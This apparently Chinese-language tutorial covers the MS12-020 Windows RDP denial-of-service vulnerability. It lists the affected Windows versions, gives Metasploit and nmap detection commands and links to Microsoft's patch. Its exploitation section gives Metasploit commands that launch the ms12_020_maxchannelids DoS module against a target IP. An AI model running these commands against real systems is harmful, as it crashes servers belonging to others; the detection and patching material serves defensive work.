漏洞描述
远程桌面协议(RDP, Remote Desktop Protocol)是一个多通道(multi-channel)的协议,让用户(客户端或称“本地电脑”)连上提供微软终端机服务的电脑(服务器端或称“远程电脑”)。
远程桌面协议服务允许远程攻击者通过一系列精心设计的数据包,导致出现拒绝服务漏洞。
影响版本
- Windows XP Service Pack 3
- Windows XP Professional x64 Edition Service Pack 2
- Windows Server 2003 Service Pack 2
- Windows Server 2003 x64 Edition Service Pack 2
- Windows Server 2003 SP2(用于基于 Itanium 的系统)
- Windows Vista Service Pack 2
- Windows Vista x64 Edition Service Pack 2
- Windows Server 2008(用于 32 位系统)Service Pack 2
- Windows Server 2008(用于基于 x64 的系统)Service Pack 2
- Windows Server 2008(用于基于 Itanium 的系统)Service Pack 2
- Windows 7(用于 32 位系统)和 Windows 7(用于 32 位系统)Service Pack 1
- Windows 7(用于 32 位系统)和 Windows 7(用于 32 位系统)Service Pack 1
- Windows 7(用于基于 x64 的系统)和 Windows 7(用于基于 x64 的系统)Service Pack 1
- Windows 7(用于基于 x64 的系统)和 Windows 7(用于基于 x64 的系统)Service Pack 1
- Windows Server 2008 R2(用于基于 x64 的系统)和 Windows Server 2008 R2(用于基于 x64 的系统)Service Pack 1
- Windows Server 2008 R2(用于基于 x64 的系统)和 Windows Server 2008 R2(用于基于 x64 的系统)Service Pack 1
- Windows Server 2008 R2(用于基于 Itanium 的系统)和 Windows Server 2008 R2(用于基于 Itanium 的系统)Service Pack 1
- Windows Server 2008 R2(用于基于 Itanium 的系统)和 Windows Server 2008 R2(用于基于 Itanium 的系统)Service Pack 1
漏洞检测工具
kali
启动msf
msfconsole
#查找exp
search ms12-020
#使用exp
use auxiliary/scanner/rdp/ms12_020_check
#设置目标ip
set rhosts 192.168.234.
run
如果提示The target is vulnerable.
表示存在漏洞
windows
windows下直接利用nmap进行检测,nmap中的script目录中存就在ms12-020的检测脚本
使用方法:
#nmap ip --script=rdp-vuln-ms12-020.nse
nmap 192.168.234.129 --script=rdp-vuln-ms12-020.nse
如果提示VULNERABLE
表示存在漏洞
漏洞利用
打开kali,启动msf进行
msfconsole
选择exp,并设置目标ip
search ms12-020
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
set rhosts 192.168.234.129
run
漏洞加固
Microsoft已经为此发布了一个安全公告(MS12-020)以及相应补丁:
链接:http://technet.microsoft.com/zh-cn/security/bulletin/ms12-020